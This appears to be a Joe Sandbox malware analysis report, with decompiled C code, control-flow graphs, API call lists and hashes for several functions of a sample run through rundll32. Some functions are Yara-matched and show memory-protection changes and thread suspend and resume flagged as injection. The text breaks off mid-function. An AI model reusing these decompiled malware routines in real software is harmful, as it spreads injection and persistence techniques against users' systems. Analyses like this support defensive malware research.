10080f1-10080fc 281->283 282->258 283->258 283->267
                          C-Code - Quality: 51%
                          			E01007F35(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x1000000;
				_t115 = _t139[3] + 0x1000000;
				_t131 = _t139[4] + 0x1000000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x1000000;
				_v16 = _t139[5] + 0x1000000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x1000002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x100a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x100a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x100a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x100a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x100a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x100a1b8; // 0x0
										 *_t102 = _t125;
										 *0x100a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x100a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                          0x01007f44
                          0x01007f5a
                          0x01007f60
                          0x01007f62
                          0x01007f67
                          0x01007f6d
                          0x01007f72
                          0x01007f75
                          0x01007f83
                          0x01007f8a
                          0x01007f8d
                          0x01007f90
                          0x01007f91
                          0x01007f94
                          0x01007f97
                          0x01007f9a
                          0x01007f9f
                          0x01007fae
                          0x00000000
                          0x01007fb4
                          0x01007fbe
                          0x01007fc8
                          0x01007fcd
                          0x01007fcf
                          0x01007fd9
                          0x01007fdc
                          0x01007fdf
                          0x01007fe5
                          0x01007fe7
                          0x01007fe7
                          0x01007fea
                          0x01007fed
                          0x01007ff2
                          0x01007ff6
                          0x01008009
                          0x0100800b
                          0x010080b3
                          0x010080b3
                          0x010080ba
                          0x010080bd
                          0x010080c7
                          0x010080c7
                          0x010080cb
                          0x01008149
                          0x0100814c
                          0x0100814e
                          0x0100814e
                          0x01008155
                          0x01008157
                          0x01008161
                          0x01008164
                          0x01008167
                          0x01008167
                          0x00000000
                          0x010080cd
                          0x010080d0
                          0x010080fe
                          0x01008108
                          0x0100810c
                          0x01008114
                          0x01008117
                          0x0100811e
                          0x01008128
                          0x01008128
                          0x0100812c
                          0x01008131
                          0x01008140
                          0x01008146
                          0x01008146
                          0x0100812c
                          0x00000000
                          0x010080d7
                          0x010080da
                          0x010080e2
                          0x010080f7
                          0x010080fc
                          0x00000000
                          0x00000000
                          0x010080fc
                          0x00000000
                          0x010080e2
                          0x010080d0
                          0x010080cb
                          0x01008011
                          0x01008018
                          0x01008028
                          0x0100802b
                          0x01008031
                          0x01008035
                          0x01008078
                          0x01008084
                          0x010080ad
                          0x01008086
                          0x0100808a
                          0x01008090
                          0x01008098
                          0x0100809a
                          0x0100809d
                          0x010080a3
                          0x010080a5
                          0x010080a5
                          0x01008098
                          0x0100808a
                          0x00000000
                          0x01008084
                          0x0100803d
                          0x01008040
                          0x01008047
                          0x01008057
                          0x0100805a
                          0x0100806a
                          0x00000000
                          0x01008070
                          0x01008051
                          0x01008055
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01008055
                          0x01008022
                          0x01008026
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01008026
                          0x01007fff
                          0x01008003
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01007FAE
                          • LoadLibraryA.KERNEL32(?), ref: 0100802B
                          • GetLastError.KERNEL32 ref: 01008037
                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0100806A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                          • String ID: $
                          • API String ID: 948315288-3993045852
                          • Opcode ID: 33ad716bb5510e1cf21e6ba55f463ab6308b0d82776ddf91e2b5ba74411cd007
                          • Instruction ID: dbb9d0fc99cc1be43139ece6e9bb4764a60861d09f5fcf21af4aff348f01868f
                          • Opcode Fuzzy Hash: 33ad716bb5510e1cf21e6ba55f463ab6308b0d82776ddf91e2b5ba74411cd007
                          • Instruction Fuzzy Hash: 42812C71A006059FEB62CF98D884BAEBBF5BF48310F10806AF585D7381E775E904CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100661D Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 285 100661d-100664f memset CreateWaitableTimerA 286 10067d0-10067d6 GetLastError 285->286 287 1006655-10066ae _allmul SetWaitableTimer WaitForMultipleObjects 285->287 288 10067da-10067e4 286->288 289 10066b4-10066b7 287->289 290 1006738-100673e 287->290 291 10066c2 289->291 292 10066b9 call 100216c 289->292 293 100673f-1006743 290->293 294 10066cc 291->294 298 10066be-10066c0 292->298 296 1006753-1006757 293->296 297 1006745-100674d RtlFreeHeap 293->297 300 10066d0-10066d5 294->300 296->293 299 1006759-1006763 CloseHandle 296->299 297->296 298->291 298->294 299->288 301 10066d7-10066de 300->301 302 10066e8-1006715 call 10043eb 300->302 301->302 303 10066e0 301->303 306 1006765-100676a 302->306 307 1006717-1006722 302->307 303->302 308 1006789-1006791 306->308 309 100676c-1006772 306->309 307->300 310 1006724-100672f call 10070d8 307->310 312 1006797-10067c5 _allmul SetWaitableTimer WaitForMultipleObjects 308->312 309->290 311 1006774-1006787 call 100561e 309->311 316 1006734 310->316 311->312 312->300 315 10067cb 312->315 315->290 316->290
                          C-Code - Quality: 83%
                          			E0100661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x100a2e0);
					_v76 = 0;
					_v80 = 0;
					L0100824A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x100a30c; // 0x2d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x100a2ec = 5;
						} else {
							_t69 = E0100216C(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x100a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E010043EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E010070D8(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x100a2e4);
							goto L21;
						} else {
							__eflags =  *0x100a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E0100561E();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x100a2e8);
								L21:
								L0100824A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x100a2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                          0x0100661d
                          0x01006633
                          0x01006637
                          0x0100663c
                          0x01006643
                          0x01006649
                          0x0100664f
                          0x010067d6
                          0x01006655
                          0x01006655
                          0x01006657
                          0x0100665c
                          0x0100665d
                          0x01006663
                          0x01006667
                          0x0100666b
                          0x01006679
                          0x01006687
                          0x0100668b
                          0x0100668d
                          0x0100669a
                          0x010066a6
                          0x010066a8
                          0x010066ae
                          0x010066b7
                          0x010066c2
                          0x010066c2
                          0x010066b9
                          0x010066b9
                          0x010066c0
                          0x00000000
                          0x00000000
                          0x010066c0
                          0x010066cc
                          0x00000000
                          0x010066d0
                          0x010066d5
                          0x010066e0
                          0x010066e0
                          0x010066e8
                          0x010066ee
                          0x010066f6
                          0x010066ff
                          0x01006706
                          0x0100670a
                          0x0100670f
                          0x01006715
                          0x00000000
                          0x00000000
                          0x01006717
                          0x0100671b
                          0x01006722
                          0x00000000
                          0x01006724
                          0x0100672f
                          0x01006734
                          0x01006734
                          0x00000000
                          0x01006765
                          0x01006765
                          0x0100676a
                          0x01006789
                          0x0100678b
                          0x01006790
                          0x01006791
                          0x00000000
                          0x0100676c
                          0x0100676c
                          0x01006772
                          0x00000000
                          0x01006774
                          0x01006774
                          0x01006779
                          0x0100677b
                          0x01006780
                          0x01006781
                          0x01006797
                          0x01006797
                          0x0100679f
                          0x010067ad
                          0x010067b1
                          0x010067bd
                          0x010067bf
                          0x010067c3
                          0x010067c5
                          0x00000000
                          0x010067cb
                          0x00000000
                          0x010067cb
                          0x010067c5
                          0x01006772
                          0x00000000
                          0x0100676a
                          0x01006738
                          0x0100673a
                          0x0100673e
                          0x0100673f
                          0x0100673f
                          0x01006743
                          0x0100674d
                          0x0100674d
                          0x01006753
                          0x01006756
                          0x01006756
                          0x0100675d
                          0x0100675d
                          0x010067e4
                          0x00000000

                          APIs
                          • memset.NTDLL ref: 01006637
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01006643
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0100666B
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0100668B
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01003EE8,?), ref: 010066A6
                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000), ref: 0100674D
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000,?,?), ref: 0100675D
                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01006797
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010067B1
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010067BD
                            • Part of subcall function 0100216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299400,00000000,?,76CDF710,00000000,76CDF730), ref: 010021BB
                            • Part of subcall function 0100216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299438,?,00000000,30314549,00000014,004F0053,052993F4), ref: 01002258
                            • Part of subcall function 0100216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010066BE), ref: 0100226A
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000,?,?), ref: 010067D0
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                          • String ID:
                          • API String ID: 3521023985-0
                          • Opcode ID: f1320e3842e2706fdabc106de03b87684ca65ed672ce36ebd4d6d0655b8febfd
                          • Instruction ID: 02343125f6d1206dd22fbb70bd5e9f7b7f1a4973cac6013bacc82f2237109f48
                          • Opcode Fuzzy Hash: f1320e3842e2706fdabc106de03b87684ca65ed672ce36ebd4d6d0655b8febfd
                          • Instruction Fuzzy Hash: 04519E70509320AFE762EF19DC44DABBBE9FB88320F008A1AF4D882190D7768514CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B61A0A Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 318 5b61a0a-5b61a2b call 5b83d64 321 5b61a31-5b61a32 318->321 322 5b61b0d 318->322 323 5b61a34-5b61a37 321->323 324 5b61a98-5b61a9f 321->324 325 5b61b13-5b61b22 VirtualProtect 322->325 326 5b61b64-5b61b70 call 5b83d9f 323->326 327 5b61a3d 323->327 330 5b61ae0-5b61af5 VirtualProtect 324->330 331 5b61aa1-5b61aa8 324->331 328 5b61b24-5b61b3a VirtualProtect 325->328 329 5b61b3f-5b61b45 GetLastError 325->329 333 5b61a43-5b61a4a 327->333 328->333 329->326 330->325 332 5b61af7-5b61b0b 330->332 331->330 335 5b61aaa-5b61ab6 331->335 336 5b61adc-5b61ade VirtualProtect 332->336 337 5b61a8c-5b61a93 333->337 338 5b61a4c-5b61a50 333->338 335->325 340 5b61ab8-5b61ac5 VirtualProtect 335->340 336->325 337->326 338->337 341 5b61a52-5b61a6e lstrlen VirtualProtect 338->341 340->325 342 5b61ac7-5b61adb 340->342 341->337 343 5b61a70-5b61a8a lstrcpy VirtualProtect 341->343 342->336 343->337
                          APIs
                          • lstrlen.KERNEL32(?,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61A58
                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A6A
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B61A79
                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A8A
                          • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61AC1
                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61ADC
                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61AF1
                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61B1E
                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61B38
                          • GetLastError.KERNEL32(?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61B3F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                          • String ID:
                          • API String ID: 3676034644-0
                          • Opcode ID: 09ae4348f847886510f54e5b91fa5042bf99779851900ebeb550193dd756a22a
                          • Instruction ID: 8ee9c1d17e6381d1b35a869ecf9e8d5cad2aecdd20c0f18ddfb9a5277761f750
                          • Opcode Fuzzy Hash: 09ae4348f847886510f54e5b91fa5042bf99779851900ebeb550193dd756a22a
                          • Instruction Fuzzy Hash: 1B411B75900709AFDB31DFA4CC45EAABBF5FB04710F048555E662A71A0E738F805DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010076BB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 74%
                          			E010076BB(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L01008244();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x100a348; // 0x428d5a8
				_t5 = _t13 + 0x100b87a; // 0x5298e22
				_t6 = _t13 + 0x100b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L01007EAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x100a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                          0x010076bb
                          0x010076c3
                          0x010076c7
                          0x010076cd
                          0x010076d2
                          0x010076d7
                          0x010076da
                          0x010076dd
                          0x010076e2
                          0x010076e3
                          0x010076e6
                          0x010076eb
                          0x010076f2
                          0x010076fc
                          0x010076fe
                          0x010076ff
                          0x01007702
                          0x0100771e
                          0x01007724
                          0x01007728
                          0x01007776
                          0x0100772a
                          0x01007737
                          0x01007747
                          0x0100774f
                          0x01007761
                          0x01007765
                          0x00000000
                          0x00000000
                          0x01007751
                          0x01007754
                          0x01007759
                          0x0100775b
                          0x0100775b
                          0x01007739
                          0x0100773b
                          0x01007767
                          0x01007768
                          0x01007768
                          0x01007737
                          0x0100777d

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?,?), ref: 010076C7
                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010076DD
                          • _snwprintf.NTDLL ref: 01007702
                          • CreateFileMappingW.KERNELBASE(000000FF,0100A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 0100771E
                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?), ref: 01007730
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01007747
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53), ref: 01007768
                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?), ref: 01007770
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                          • String ID:
                          • API String ID: 1814172918-0
                          • Opcode ID: 0b312f4717f6f840e2a76a3dd27ef504ccaf5b0db56d9f17decb2f9213904432
                          • Instruction ID: 101e2a860f9ca47f0725bff9cd479e853147794b4f89dcd6781055a51f4fdf74
                          • Opcode Fuzzy Hash: 0b312f4717f6f840e2a76a3dd27ef504ccaf5b0db56d9f17decb2f9213904432
                          • Instruction Fuzzy Hash: F821C376640204BFE723EB68CC09F9E3BA9BB44754F204061F68DE71D1DA75A905CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6C5C4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125threadsynchronizationinjectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 353 5b6c5c4-5b6c609 memset call 5b7212c 356 5b6c6f5-5b6c6fc 353->356 357 5b6c60f 353->357 358 5b6c616-5b6c61e 356->358 359 5b6c702-5b6c705 call 5b7ed07 356->359 357->358 360 5b6c620-5b6c637 call 5b76de0 358->360 361 5b6c63d-5b6c64f 358->361 363 5b6c70a 359->363 360->361 371 5b6c73c-5b6c740 360->371 365 5b6c651-5b6c658 call 5b614c6 361->365 366 5b6c65b-5b6c672 call 5b75220 361->366 367 5b6c73a 363->367 365->366 376 5b6c734 GetLastError 366->376 377 5b6c678-5b6c67c 366->377 367->371 374 5b6c742 371->374 375 5b6c74b-5b6c751 371->375 374->375 376->367 378 5b6c682-5b6c693 call 5b79048 377->378 379 5b6c72d-5b6c732 377->379 378->376 382 5b6c699 378->382 379->371 383 5b6c69e-5b6c6ba WaitForSingleObject 382->383 385 5b6c6bf-5b6c6e2 SuspendThread call 5b636bb 383->385 386 5b6c6bc-5b6c6be 383->386 389 5b6c6e4-5b6c6e7 385->389 390 5b6c6e9-5b6c6ec 385->390 386->385 389->383 389->390 391 5b6c6ee-5b6c6f3 390->391 392 5b6c70c-5b6c71a call 5b76de0 390->392 394 5b6c71c-5b6c72b call 5b79048 391->394 392->394 394->371
                          APIs
                          • memset.NTDLL ref: 05B6C5E7
                            • Part of subcall function 05B7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                            • Part of subcall function 05B7212C: GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                            • Part of subcall function 05B7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                            • Part of subcall function 05B7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                            • Part of subcall function 05B7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05B6C6A1
                          • WaitForSingleObject.KERNEL32(00000064), ref: 05B6C6AF
                          • SuspendThread.KERNEL32(00000004), ref: 05B6C6C2
                            • Part of subcall function 05B76DE0: memset.NTDLL ref: 05B770AA
                          • ResumeThread.KERNEL32(00000004), ref: 05B6C745
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                          • String ID: v
                          • API String ID: 2397206891-1801730948
                          • Opcode ID: 37202fd90aa6d99594bff3b41463b9cbca96c1f3223b2993f777e9945f60468a
                          • Instruction ID: d9a6ae32209b15d6f4085a2c094e2c02b8fec1544558a2f1f0a915c05843a6e8
                          • Opcode Fuzzy Hash: 37202fd90aa6d99594bff3b41463b9cbca96c1f3223b2993f777e9945f60468a
                          • Instruction Fuzzy Hash: 81418871A00208EFDB21AFA4CC89ABE7FAAFF04250F1444A5F99997150CB39FE51CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004274 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 93%
                          			E01004274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
